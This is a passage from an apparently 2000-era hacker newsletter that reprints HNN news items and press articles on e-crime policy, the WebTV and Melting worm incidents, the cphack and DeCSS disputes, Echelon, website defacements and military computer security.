time, we are going to be sharing resources between ourselves and the
wider partnership both in the private and public sense.'
The commissioners agreed to establish an Electronic Crime Steering
Committee to evaluate Australasia's capacity to fight electronic crime.
It will develop an Australasian Law Enforcement Electronic Crime Strategy
by the end of June.
@HWA
43.0 HNN:Mar 17th:Apex DVD Defeats Region and Macrovision
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Sciri
Hot on the trail of the PlayStation2 being able to play
Region 1 discs is the Apex AD-600A, a DVD/VCD/CD/MP3
player that can disable CSS, Region and Macrovision
settings after entering a simple code (Preferences ->
Step -> Prev Track -> Next Track).
Review of the Apex-600A
http://uberauk.epinions.com/elec-review-10C9-40ABFE-388DCD5F-bd3
Nerd Out
http://www.nerd-out.com/
@HWA
44.0 HNN:Mar 20th:First Malicious Code Direct at WebTV
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Hal0
Microsoft is working on a patch of its service to
counteract malicious programming code that overloads
WebTV newsgroup discussions with fake postings. While
the malicious code self replicates like a virus Microsoft
insists on calling it malicious code. The code appends
itself to a WebTV users signature file and then cross
posts itself to numerous newsgroups.
Wired
http://www.wired.com/news/technology/0,1282,35045,00.html
WebTV's 'Non-Virus' Virus
by Chris Oakes
3:00 a.m. Mar. 18, 2000 PST
Although it prefers to call the trouble a "malicious code," WebTV has
experienced its first virus. Parent company Microsoft is working on
a patch of its service to counteract malicious programming code that
overloads WebTV newsgroup discussions with fake postings.
"Newsgroups are starting to flood with junk posts, and you can't post,"
said Brian Bock, editor-in-chief of Net4TV Voice, an online publication
focusing on Internet services via television. WebTV users first reported
the problem to Net4TV.
Bock said the virus -- a first for the closed, non-PC WebTV system -- is
like the renowned PC virus Melissa. The similarity is that it
self-replicates, he said. But this virus does it by altering signatures
that appear at the bottom of WebTV user's Usenet messages.
"When another WebTV user runs across [an infected message], it writes the
virus into their email signature," he said. "Then when they go make a
Usenet posting, it cross-posts. They end up posting to a whole bunch of
different news groups."
The result is the multiplication of junk messages in discussion forums
until discussions are disrupted completely because the system's maximum
number of viewable messages is reached.
Microsoft was extremely reluctant to call the problem a virus. "It's not a
virus," said Microsoft spokeswoman Claire Haggard. "There's never been a
virus on WebTV."
Then what is it?
Haggard said the problem was malicious code in WebTV's Usenet posting
system.
The company took issue with the description of the code as
"self-replicating," saying it had to be "manually" inserted in Usenet
posts and didn't self-replicate. Furthermore, Haggard said the multiplying
Usenet messages did not involve the exploitation of a user's signature.
Bock said the virus does make use of an existing flaw in the service's
email system. That hole is exploited along with a WebTV code for posting
messages, Bock said.
The issues are separate, Haggard said.
In any case, the problem gets awfully close to meeting the conventional
definition of virus: a malicious code that, once installed, performs
usually undesirable tasks on the victim's computer.
In most technical definitions, self-replication is not a prerequisite,
although the Merriam-Webster definition of virus does include
self-replication: "A computer program usually hidden within another
seemingly innocuous program that produces copies of itself."
Virus or not, manual or self-replicating, the malicious code will be
patched, hopefully by next week, the company said. Meanwhile, WebTV will
be removing the junk posts. Haggard said the company has only heard from
14 users inquiring about the problem.
She said the company plans a regular update of its client and server
software soon, and that "the upgrade will be made immune from such hacker
problems."
@HWA
45.0 HNN:Mar 20th:Liberia Claims Attack In CyberWar
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
President Charles Taylor of Liberia has claimed that his
country is under attack in a cyber war but failed to say
by whom. He made the statement after his government
shut down two independent radio stations and their
related web sites. Amnesty International and the US
State Department have vigorously protested the station
closings.
Wired
http://www.wired.com/news/politics/0,1283,35016,00.html
'Cyber War' in Liberia
Reuters
7:00 a.m. Mar. 17, 2000 PST
MONROVIA -- President Charles Taylor of Liberia, reacting to criticism of
the government's closure of two radio stations, said a "cyber war" had
been declared on his country.
"A cyber war has been declared on Liberia and the government is doing
everything possible to fight back," he said on Thursday at his Executive
Mansion after signing into law seven bills.
He did not say who was waging this war.
Star, an independent radio station that was closed down on Wednesday, had
an Internet news service popular with Liberians abroad that was also
closed.
The government justified the closures by saying that "agents provocateurs"
were using the news media, especially radio stations, to create security
problems.
"The government took the action to prevent an outbreak of another war
which could be caused by negative broadcasts to create hatred among the
Liberian people through hate messages," Taylor said.
Taylor's election in 1997 formally ended a civil war that he started in
December 1989.
The U.S. government joined human rights groups, local media, and the Press
Union of Liberia in protesting against the closures.
"The United States vigorously protests the unwarranted closure of these
two radio stations and calls on the Government of Liberia to reopen them
immediately, without conditions, and to return the confiscated equipment,"
the U.S. State Department said in a statement.
Rights group Amnesty International has linked the closure of Star to a
March 13 broadcast it made about a U.S. State Department report on human
rights in Liberia.
Star was established in 1997 by the Hirondelle Foundation, a Swiss-based
non-governmental organization, with the help of the United States Agency
for International Development.
The second station, Radio Veritas, is run by the Roman Catholic Church.
The government suspended the station but said it could start operating
again if it provided a written assurance it would broadcast only religious
material.
The Catholic Archbishop of Monrovia said Veritas had a constitutional
right to broadcast.
"It is our constitutional right to disseminate information to the public
and if we abuse the right, let the courts deal with us, not the
executive," Archbishop Michael Kpakala Francis said in a statement
released late on Thursday.
"We will not give any commitment to the government of Liberia that will
restrict us to religious programs," he added, denying that Veritas'
license restricted it to religious broadcasts.
@HWA
46.0 HNN:Mar 20th:Judge Bans Anti-Filter Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Aj
U.S. District Judge Edward F. Harrington has granted an
injunction requested by Microsystems Software Inc. to
prevent distribution of cphack. Cphack was designed to
bypass the surfing restrictions used by CyberPatrol as
well as list every web site blocked by the software. The
Judges decision effectively blocks anyone from
distributing the software. There were no defendants
present at the hearing, the next hearing is scheduled for
March 27th. (This could be a rather serious threat to
peoples' right to reverse engineer and to even write
software.)
MSNBC
http://www.msnbc.com/news/383603.asp
Associated Press - via Washington Post
http://www.washingtonpost.com/wp-srv/aponline/20000317/aponline133352_000.htm
Porn Software Injunction Issued
By Martin Finucane
Associated Press Writer
Friday, March 17, 2000; 1:33 p.m. EST
BOSTON �� A federal judge Friday ordered a halt to the distribution of
a computer program that allows children to bypass software designed to
keep them away from Internet pornography.
Microsystems Software Inc. of Framingham, which sells the widely used
"Cyber Patrol" filtering software, sued two computer experts who
distributed the bypassing software via the Internet. The software, called
"cphack," also discloses a list of sites that are blocked by the Cyber Patrol
program.
U.S. District Judge Edward F. Harrington ordered Matthew Skala, a
self-described cryptography buff who attends the University of Victoria in
British Columbia, and Eddy L.O. Jansson, believed to be living in
Sweden, to stop spreading the "cphack" program.
The judge also blocked distribution of the "cphack" software by anyone
working with them.
Microsystems attorney Irwin Schwartz said the judge's order extended to
any "mirror" Web sites, where the program may have been copied and
made available. Another hearing is set for March 27 on the case.
Skala and Jansson were not represented at Friday's hearing, and they did
not immediately return e-mails seeking comment.
Microsystems has said in its legal filings it would suffer "irreparable harm"
from the publication of the bypassing software, which it said sought to
destroy the market for its product by rendering it ineffective.
"The practical effect is that ... children may bypass their parents' efforts to
screen out inappropriate materials on the Internet," according to the filing
made this week.
Free speech advocates criticized the company's move to block
distribution of the software.
Peter Junger, a law professor at Case Western Reserve University in
Cleveland and an advocate of free speech on the Internet, said it "looks
like a rather horrifying challenge to people's right to write software" and to
"reverse-engineer" software, which means figure out how it works.
"The idea that one can prevent reverse-engineering of software and
publishing the results of that reverse-engineering strikes me as a very
dangerous restriction on free speech," he said before the judge's ruling.
Chris Hansen, a senior lawyer with the national office of the American
Civil Liberties Union, said there might be debate about whether
distributing the bypass software was legal, but that the ACLU agreed with
at least one role of the software � publicizing the list of blocked sites.
"Parents who want to install these products ought to be able to do so," he
said, adding, "How can you, as a parent, make an intelligent decision (on
filtering software)if the product won't tell you what they're blocking?"
� Copyright 2000 The Associated Press
@HWA
47.0 HNN:Mar 20th:We Spy To Prevent Bribes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
A former Director of Central Intelligence, R. James
Woolsey, has written a story about why the United
States spies on its allies. The primary reason given is to
prevent bribery so that US companies can compete on
an even playing field. (Sorry but I don't buy it, that is
too much power for such a simple purpose but I guess
the ends justify the means for the US Government. So
why can't US citizens spy on their own government to
make sure they are complying with the law? Where are
the checks and balances?)
Wall Street Journal - via Cryptome
http://cryptome.org/echelon-cia2.htm
17 March 2000. Thanks to DB.
We look forward to seeing and hearing James Woolsey and Duncan Campbell
openly debate this controversy, in Congressional hearings, on global TV,
the Internet, MilNet and IntelNet -- and all the Echelon surveillance
stations based in countries of those who "can't compete with the US."
See transcript of Woolsey's March 7 remarks on economic espionage to the
Foreign Press Center: http://cryptome.org/echelon-cia.htm
The Wall Street Journal, March 17, 2000
Why We Spy on Our Allies
By R. James Woolsey, a Washington lawyer and a former Director of Central
Intelligence.
What is the recent flap regarding Echelon and U.S. spying on European
industries all about? We'll begin with some candor from the American side.
Yes, my continental European friends, we have spied on you. And it's true
that we use computers to sort through data by using keywords. Have
you stopped to ask yourselves what we're looking for?
The European Parliament's recent report on Echelon, written by British
journalist Duncan Campbell, has sparked angry accusations from continental
Europe that U.S. intelligence is stealing advanced technology from
European companies so that we can -- get this -- give it to American
companies and help them compete. My European friends, get real. True, in a
handful of areas European technology surpasses American, but, to say this
as gently as I can, the number of such areas is very, very, very small.
Most European technology just isn't worth our stealing.
Why, then, have we spied on you? The answer is quite apparent from the
Campbell report -- in the discussion of the only two cases in which
European companies have allegedly been targets of American secret
intelligence collection. Of Thomson-CSF, the report says: "The
company was alleged to have bribed members of the Brazilian government
selection panel." Of Airbus, it says that we found that "Airbus agents
were offering bribes to a Saudi official." These facts are inevitably left
out of European press reports.
That's right, my continental friends, we have spied on you because you
bribe. Your companies' products are often more costly, less technically
advanced or both, than your American competitors'. As a result you bribe a
lot. So complicit are your governments that in several European
countries bribes still are tax-deductible.
When we have caught you at it, you might be interested, we haven't said a
word to the U.S. companies in the competition. Instead we go to the
government you're bribing and tell its officials that we don't take kindly
to such corruption. They often respond by giving the most
meritorious bid (sometimes American, sometimes not) all or part of the
contract. This upsets you, and sometimes creates recriminations between
your bribers and the other country's bribees, and this occasionally
becomes a public scandal. We love it.
Why do you bribe? It's not because your companies are inherently more
corrupt. Nor is it because you are inherently less talented at technology.
It is because your economic patron saint is still Jean Baptiste Colbert,
whereas ours is Adam Smith. In spite of a few recent reforms, your
governments largely still dominate your economies, so you have much
greater difficulty than we in innovating, encouraging labor mobility,
reducing costs, attracting capital to fast-moving young businesses and
adapting quickly to changing economic circumstances. You'd rather not go
through the hassle of moving toward less dirigisme. It's so much easier to
keep paying bribes.
The Central Intelligence Agency collects other economic intelligence, but
the vast majority of it is not stolen secrets. The Aspin-Brown Commission
four years ago found that about 95% of U.S. economic intelligence comes
from open sources.
The Campbell report describes a sinister-sounding U.S. meeting in
Washington where -- shudder! -- CIA personnel are present and the
participants -- brace yourself -- "identify major contracts open for bid"
in Indonesia. Mr. Campbell, I suppose, imagines something like this:
A crafty CIA spy steals stealthily out of a safe house, changes disguises,
checks to make sure he's not under surveillance, coordinates with a spy
satellite and . . . buys an Indonesian newspaper. If you Europeans really
think we go to such absurd lengths to obtain publicly available
information, why don't you just laugh at us instead of getting in high
dudgeon?
What are the economic secrets, in addition to bribery attempts, that we
have conducted espionage to obtain? One example is some companies' efforts
to conceal the transfer of dual-use technology. We follow sales of
supercomputers and certain chemicals closely, because they can be
used not only for commercial purposes but for the production of weapons of
mass destruction. Another is economic activity in countries subject to
sanctions -- Serbian banking, Iraqi oil smuggling.
But do we collect or even sort secret intelligence for the benefit of
specific American companies? Even Mr. Campbell admits that we don't,
although he can't bring himself to say so except with a double negative:
"In general this is not incorrect." The Aspin-Brown Commission was
more explicit: "U.S. Intelligence Agencies are not tasked to engage in
'industrial espionage' -- i.e. obtaining trade secrets for the benefit of
a U.S. company or companies."
The French government is forming a commission to look into all this. I
hope the commissioners come to Washington. We should organize two seminars
for them. One would cover our Foreign Corrupt Practices Act, and how we
use it, quite effectively, to discourage U.S. companies from bribing
foreign governments. A second would cover why Adam Smith is a better guide
than Colbert for 21st-century economies. Then we could move on to
industrial espionage, and our visitors could explain, if they can keep
straight faces, that they don't engage in it. Will the next commission
pursue the issue of rude American maitre d's?
Get serious, Europeans. Stop blaming us and reform your own statist
economic policies. Then your companies can become more efficient and
innovative, and they won't need to resort to bribery to compete.
And then we won't need to spy on you.
@HWA
48.0 HNN:Mar 20th:LAPD Tells Parody Site To Chill
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Rho
The Computer Crimes Division of the L.A. County
Sheriff's Department has forced
www.fortheloveofjulie.com to alter its content. Fearing
that the fake stalking site was a little too real and that
it could hamper probes of real crimes they strongly
suggested that the owner make changes to the site or
take it down. The site is meant to be entertaining and
spooky similar to 'The Blair Witch Project'.
CNN
http://www.cnn.com/2000/TECH/computing/03/17/julie.folo/index.html
Authorities tell faux-stalker
site to tone it down
March 17, 2000
Web posted at: 8:46 p.m. EST (0146 GMT)
By D. Ian Hopper
CNN Interactive Technology Editor
(CNN) -- After getting over 2 million
page views, the authors of a
faux-stalker site got a call from
someone who wasn't such a fan -- a
police detective.
A detective from the Computer
Crimes Division of the L.A. County Sheriff's Department contacted Spark
Factory president Tim Street Friday. According to authorities, the detective
strongly suggested that Street take down FortheloveofJulie.com, a fake
stalker site that aims to be an entertaining but spooky story in the tradition of
last year's "The Blair Witch Project" phenomenon.
The site is a shrine to "Julie" from her admirer, a video-store clerk who
follows her home and to her work, taking videos and posting a journal
complete with movie clips and pictures.
The site has become very popular, Street says,
through both word-of-mouth and media
attention. While it's completely fake, many users
failed to see a disclaimer because they're going
through a publicized back door that bypasses
SpookySites.com, where it's indexed.
SpookySites contains a small disclaimer upon entering the site that informs
users that the content within "may contain fictionalization."
But like many others, the detective entered the site through a back door,
missing the disclaimer. When he called Street, the site's author was skeptical.
"He told me he was with the police department. I wanted to call him back to
make sure, because practical jokes around here are running rampant," Street
said. "One guy here said he was from the FBI."
"We received a tip from an investigator on the East Coast," says Sgt. Larry
Balich.
Authorities found a photo in the site that clearly showed a vehicle and license
plate, and traced it back to Street.
"We thought we had a stalking situation on our hands," Balich says. "But we
needed a victim. You can't investigate a case without a victim or witness,
and we had neither."
After contacting the district attorney's
office, detectives found that no crime
had been committed. Still, Street says,
police "strongly suggested" that he
take the site down or close the back
door and make the disclaimer more
obvious.
"We're going to frame it inside
CreepySites," Street said. "We'll have
a bolder disclaimer that says
FortheloveofJulie is fictitious, and Julie
is not in any danger."
"We don't think we have to," he says, "but we don't want to have any
problems."
Balich says the site was just a little too real and could hamper probes of real
crimes.
"It's troublesome to have something like this on the Internet," Balich says. "I
consider it a misuse of a real positive thing."
The site was taken down for most of the day but came back up in the
afternoon with the intended changes.
Street says he made the site as an "Internet soap opera" meant to entertain
users who were in for a suspenseful thrill.
"It's not our intent to be evil, creepy people," he says. "We're trying to
showcase how this new experience can change entertainment on the
Internet."
Street says he has already left a message with the FBI to try to head off any
more misunderstandings.
@HWA
49.0 HNN:Mar 20th:New Windows Worm Virus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
A new worm virus that can shut down MS Windows
platforms and make the operating system permanently
unusable has been discovered by Computer Associates
International. Once launched via MS Outlook under
Windows 95, 98, 2000 or NT, Win32/Melting.Worm saves
itself into a Windows directory under the name
MeltingScreen.exe. It renames .exe files into .bin files.
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,15777,00.html
Windows �Worm� Virus
Slithers
Computer Associates identifies virus that travels
through Outlook.
by Kathleen Ohlson, Computerworld
March 17, 2000, 6:56 a.m. PT
A new worm now "in the wild" has the potential to shut
down Windows platforms and make the operating
system permanently unusable.
Computer Associates International discovered the
worm, Win32/Melting.worm, on Tuesday, when
customers started to find it in their e-mail systems,
says Narender Mangalam, director of security solutions
at CA. So far, it has hit some Fortune 1000 software
companies, he says.
"The risk level is moderate, and it hasn't caused too
much damage because we believe we've caught it in
time," Mangalam says. CA markets InoculateIT, a virus
detection and prevention program.
The Melting Worm is unleashed through Microsoft's
Outlook running on Windows 95, 98, 2000, or NT,
according to CA representatives. Once launched, the
worm puts a copy of itself into a Windows directory as
MeltingScreen.exe and remains in memory. Files with
.exe extensions in a system's Windows directory are
renamed with .bin extensions.
As the worm renames files, including ones critical to
operating Windows, these changes may render the
operating system useless.
The worm also starts to e-mail itself to all the names in
a victim's Outlook address book and randomly
executes other .exe files, Mangalam says. This
potentially can take down a company's e-mail system.
@HWA
50.0 HNN:Mar 20th:GNIT Now Freeware
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by m0nk
Ellicit Organization has released a freeware version of
their latest program, GNIT NT Vulnerability Scanner. The
scanner checks for over a dozen NT vulnerabilities.
Ellicit.org
http://security.ellicit.org/
@HWA
51.0 HNN:Mar 20th:Online Criminals Labeled Boffins
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by dogcow
The Australian Federal Police Commissioner, Mick Palmer,
was recently quoted as saying that while much of online
crime is currently "in the early stages it is being done by
people who simply are boffins and are doing it by way of
exploration rather than criminal intent." (Glad to see
that Australia is on top of Internet crime.)
Sydney Morning Herald
http://www.smh.com.au/news/0003/18/national/national6.html
NATIONAL
'Police must get ahead of e-crime'
By JANINE ISRAEL
Undetected organised electronic-crime could undermine the nation's security
and financial stability, the Australian Federal Police Commissioner, Mr
Mick Palmer, warned yesterday.
He told a conference of Australasian and south-west Pacific police
commissioners in Canberra that a co-ordinated international response was
required urgently to crack down on electronic terrorism, child pornography,
racism, fraud and money laundering.
Mr Palmer said the Internet meant crimes were being committed in countries
where perpetrators had "never set foot" and international legislation and
treaties must be set up to prosecute criminals irrespective of national
borders.
Australia, New Zealand, Fiji and Papua New Guinea police commissioners
announced they would establish an Australasian Law Enforcement Electronic
Crime Strategy to address the issue.
Mr Palmer said the Australian police force lacked electronic expertise, and
were looking to recruit computer boffins to tackle electronic crime.
"We need to be buying those skills from the cutting edge of the
technological workplace. We need to form close partnerships with the
private sector and wider government agencies," he said.
But employing people with the skills to fight electronic crime was costly.
Retention was a problem in a competitive market where those with
technological skills were lured by high salaries to the private sector.
The international nature of cyberspace made it almost impossible to
identify perpetrators let alone snare electronic criminals. Credit card
fraud already was costing the credit card industry billions, Mr Palmer
said.
He said growing forms of e-crime included such things as money laundering
and tax evasion. Cyber-stalking, illegal interceptions or "electronic
eavesdropping" were a concern, as were political and industrial espionage.
Fraudulent sales pitches along with bogus charitable or investment
solicitations were increasingly common.
These were not necessarily "new crimes", Mr Palmer said, just "new methods
to commit traditional crimes".
"One of the difficulties with electronic crime is that not only is it very
intrusive and superficially invisible, but many crimes can be committed
without the victim knowing it has been committed," he said.
While e-crime is still in its "embryo state", authorities predict it will
expand with the electronic market to become more organised and
sophisticated. "Much of it in the early stages is being done by people who
simply are boffins and are doing it by way of exploration rather than
criminal intent. The damage caused by those activities is of course equally
serious," he said.
He said police were "alarmed" by the capability of people to commit
offences on a global basis, with complete anonymity, with speed and on a
large scale. A staggering 900 million people were expected to be using
the Internet by the end of the year.
@HWA
52.0 HNN:Mar 21st: Conflict In Kashmir Continues Online
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by McIntyre
Over 600 web sites in India including government
systems have been defaced in recent months by people
in Pakistan. The conflict in Kashmir is seen as one of the
primary reasons for the defacements.
CNN
http://www.cnn.com/2000/TECH/computing/03/20/pakistani.hackers/index.html
Kashmir conflict continues to
escalate -- online
By D. Ian Hopper
CNN Interactive Technology Editor
March 20, 2000
Web posted at: 8:15 p.m. EST (0115 GMT)
(CNN) -- A group of Pakistani
hackers has used the conflict in
Kashmir as a reason to deface almost
600 Web sites in India and take
control of several Indian government
and private computer systems, according to the group.
A computer security Web site -- attrition.org -- has records of the
defacements claimed by the Muslim Online Syndicate.
The M0S, which a member says consists of mostly Pakistani Muslims, is
made up of self-proclaimed "hacktivists," those who commit computer
crimes -- ranging from simple defacement to full-scale intrusions to denial of
service attacks -- in order to bring attention to a social cause.
The group has nine active members, according to a representative who
spoke on behalf of the group on condition of anonymity. They range from 16
to 24 years old, the representative said. Several of them are students or
computer professionals, and one is a medical student, the representative
added.
Unlike the majority of Web vandals, the MOS
members say they secretly take control of a
server, then deface the site only when they
"have no more use" for the data or the server
itself.
"The servers we control range from harmless mail and Web services to
'heavy duty' government servers," says the MOS representative. "The data is
only being categorically archived for later use if deemed necessary."
The group says it's not interested in e-commerce sites or credit card
information.
Most of the group's defacements came in one fell swoop, when they broke
into India's largest Internet service provider, IndiaLinks. While there, they
defaced more than 500 sites hosted by the company, including many travel
and company sites, IndiaLinks confirms.
IndiaLinks, based in Bombay, hosts more than
6,000 Web sites, according to CEO Bhavin
Chandarana.
Chandarana says the group had access to
servers co-hosted by Alabanza, an American
ISP. He says the group had access for about an
hour.
The MOS won't be facing any legal problems
stemming from its exploits, Chandarana says,
because IndiaLinks was not able to get the server logs from Alabanza.
Chandarana says his company is in the process of removing their business
from the U.S. ISP.
Representatives for Alabanza did not respond to several e-mails and two
phone messages requesting comment.
One of the Web sites defaced was that of the Indian Science Congress
2000. The ISC's local organizing secretary, Bhushan Patwardhan, told The
Hindu newspaper that the defacement was removed as soon as it was
detected.
The MOS has a Web site mirroring its attacks that contains a well-known
expletive. Expletives in domain names used to be taboo, but with the
deregulation of domain registration, it is no longer forbidden.
"We hope to bring the Kashmir conflict to the world's attention," MOS says.
"We wish to see the day when our Muslim brethren will be given the right to
choose, as was promised them half a century ago."
India and Pakistan have fought two wars over the last half-century over rival
claims for the Himalayan territory of Kashmir. They clashed again last
summer when Pakistan-based fighters seized mountain peaks inside India.
Hundreds of militants died before India and Pakistan -- under international
and domestic pressure -- withdrew their forces.
Ignoring world pressure, India and Pakistan both tested nuclear devices in
1998, dramatically escalating tensions.
The stated goal of the MOS -- social action through hacking -- is becoming
a more popular one. Hacktivists attacked the World Trade Organization
Web site during their Seattle conference last year, and a mailing list helps
concerned activists discuss strategy, targets and coordinate attacks. Rather
than simply defacing sites, denial of service attacks have become the
weapon of choice.
Alex Fowler, Strategic Initiatives Director for the Electronic Frontier
Foundation, predicted this escalation in October 1999 in an interview with
CNN Interactive.
"We will see very serious attacks. Information stealing could have very
long-term consequences for consumers," Fowler said.
@HWA
53.0 HNN:Mar 21st:Army Weapon Systems At Risk of Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
Army Maj. Sheryl French has said that the possibility
exists for intruders to infiltrate the computer systems
used in tanks and other armored vehicles. Modern tanks
and ships make extensive use of computers, software
and data communications links for functions such as
navigation, targeting and command and control. DISA
has already tested the possibility of inputting false
navigation data into a ships computer from an
unauthorized land based laptop.
Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0320/web-hacker-03-21-00.asp
Hacker-controlled tanks, planes and warships?
BY Dan Verton 03/21/2000
Army officials are worried that sophisticated hackers and other
cybercriminals, including military adversaries, may soon have the
ability to hack their way into and take control of major military weapon
systems such as tanks and ships.
Speaking this month at the annual Army Directors of Information Management
Conference in Houston, Army Maj. Sheryl French, a program manager
responsible for the Army�s Information Assurance Architecture for the
Digitized Force, said the potential exists for hackers to infiltrate the
computer systems used in tanks and other armored vehicles. Unlike in the
past, today�s modern tanks and ships are almost entirely dependent on
computers, software and data communications links for functions such as
navigation, targeting and command and control.
Although the Pentagon has always had computer security issues to deal
with, "we�ve never had computers" in tanks and armored personnel
carriers before, said French, pointing to a picture of an M-1 Abrams Main
Battle Tank.
In fact, the Defense Department has already tested and proven that hackers
have the ability to infiltrate the command and control systems of
major weapons, including Navy warships. According to a training CD-ROM on
information assurance, published by the Defense Information Systems
Agency, an Air Force officer sitting in a hotel room in Boston used a
laptop computer to hack into a Navy ship at sea and implant false
navigation data into the ship�s steering system.
"Yes, this actually happened," the CD-ROM instructs military personnel
taking the course. "Fortunately, this was only a controlled test to
see what could be done. In reality, the type of crime and its objective is
limited only by people�s imagination and ability."
John Pike, a defense and intelligence analyst with the Federation of
American Scientists, said that although there are well-known
security gaps in the commercial systems that the Army plans to use on the
battlefield, hacking into tanks and other weapons may prove to be too
difficult for an enemy engaged in battle.
"The problem for the enemy is that computer security vulnerabilities will
almost certainly prove fleeting and unpredictable," said Pike,
adding that such tactics would be nearly impossible to employ beyond the
random harassment level.
@HWA
54.0 HNN:Mar 21st:2600 AU to Broadcast DeCSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by hool
In yet another twist in the MPAA vs. DeCSS case 2600
of Australia plan to broadcast the source code of DeCSS
on national TV. Australian Federal copyright laws can
not currently prevent this broadcast. The information
will be displayed at 12 frames per second, it is
recommended that viewers tape record the information
and review it later frame by frame. The code is
expected to air sometime in the next few weeks
between 3 and 4 am.
Computerworld AU
http://www.computerworld.idg.com.au/CWT1997.nsf/cwtoday/DB6C6D9B3448ECE64A2568A00075454B?OpenDocument
2600 AU
http://www.2600.org.au
ComputerWorld;
Hackers with heart
By Byron Kaye
13 March, 2000
SYDNEY - Loopholes in Federal laws mean
hacker advocate group 2600 Australia will be able
to broadcast DVD decryption codes and other
sensitive information on national television within
weeks.
Grant Bayley, who heads up 2600 Australia, the
international organisation's Australian operation,
said it was currently devising a 15-second
broadcast, which he said would contain text files,
delivered at 12 frames per second, and suggestions
pertaining to the "ethics" of datacasting, computer
security and privacy, and access-controlling DVD
encryption.
Bayley said the text contained in the broadcast
would not be comprehensible as it appeared live on
television, but he suggested viewers record the
broadcast on video and then watch the information
afterwards "frame by frame".
Bayley said the broadcast would be "fed" to
Channel 10 by MindShare, a company that
supplies advertising material in bulk for the
television station. MindShare's own advertising
slogan is "Head space invaders". The broadcast
time was not yet known, but Bayley said it was
expected to screen between 3:00 and 4:00 am
"some time in the next few weeks".
Bayley maintained information contained in the
broadcast would "primarily encourage ethical",
educational use of new technologies such as
datacasting. However, he admitted some
information -- pertaining to the decryption of DVD
access codes -- which could not be legally
broadcast in the US, would be screened.
Australian Federal copyright laws, even those
currently being amended, were unable to prevent
broadcasting of information such as DVD
decryption codes, regardless of how commercially
crippling the information might potentially be, he
said.
Bayley said he was convinced that he knew the
15-year-old hacker who penetrated the ASX
website two weeks ago "pretty well". The ASX
hack caused an outage of four hours, leaving the
site littered with banner messages reading
"Prosthetic owns the ASX". Bayley maintained
2600 did not support or encourage vandalistic
hack attacks such as this. "Stupid people do stupid
things," he said.
The title "2600" refers to the frequency of pitch that
technology-savvy Americans played into their
telephone receivers to thwart long distance call
charges in the early 1980s.
@HWA
55.0 HNN:Mar 21st:CIA Monitoring Upheld by Court
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
The CIA's Foreign Bureau of Information Services policy
allowing agency officials to monitor employees' Internet
use has been upheld by federal appeals court. The
policy included provisions to review employees' e-mail
messages and to collect information on their Web site
visits. The policy had helped convict a federal employee
of downloading child pornography on government time.
Government Executive Magazine
http://www.govexec.com/dailyfed/0300/032000m1.htm
March 20, 2000
DAILY BRIEFING
Court upholds agency reviews of
employees' Internet use
By Kellie Lunney
klunney@govexec.com
A federal appeals court has upheld a CIA policy allowing
agency officials to monitor employees' Internet use. The policy
had helped convict a federal employee of downloading child
pornography on government time.
The CIA's Foreign Broadcast Information Service
implemented a policy in June 1998 authorizing "electronic
audits" of employee computers in order to crack down on
non-business related Internet use. Those audits included
reviewing employees' e-mail messages and collecting
information on their Web site visits.
Later that summer, Science Applications International Corp.
(SAIC), which had a contract to manage FBIS' computer
network and monitor inappropriate Internet behavior, alerted
the agency when the keyword "sex" turned up numerous hits in
a firewall database during a routine test. The hits originated
from the computer of Mark L. Simons, an electronic engineer
at FBIS.
FBIS officials then searched Simons' computer and office on
four occasions, eventually compiling enough evidence to indict
him on two counts of knowingly receiving and possessing child
pornography downloaded from the Internet and stored on his
government hard drive.
Simons claimed that his Fourth Amendment rights had been
violated during the searches. But a district court upheld the
searches. Simons was found guilty and was sentenced to 18
months in jail.
The U.S. Court of Appeals for the Fourth Circuit affirmed that
decision in late February, saying that Simons failed to prove
that he had a "legitimate expectation of privacy in the place
searched or the item seized."
According to the appeals court, "In the final analysis, this case
involves an employee's supervisor entering the employee's
government office and retrieving a piece of government
equipment in which the employee had absolutely no
expectation of privacy [due to the agency's Internet
policy]�equipment that the employer knew contained
evidence of crimes committed by the employee in the
employee's office ... Here, there was a conjunction of the
conduct that violated the employer's policy and the conduct
that violated the criminal law."
The court's decision in USA v. Simons (99-4238) is online at
www.law.emory.edu/4circuit/feb2000/994238.p.html.
@HWA
56.0 HNN:Mar 21st:Make Your Reservations for RootFest Now!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by rootfest
RootFest is back for its second try. RootFest 2000 will
be June 14-16, 2000, and will be held at the brand-new
St. Paul RiverCentre facility just 15 minutes from the
Mall of America. Three days of speakers, events,
contests and more is planned, making this a can't-miss
event.
RootFest
http://www.rootfest.org/
@HWA
57.0 HNN:Mar 22nd:Cybercrime On The Rise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
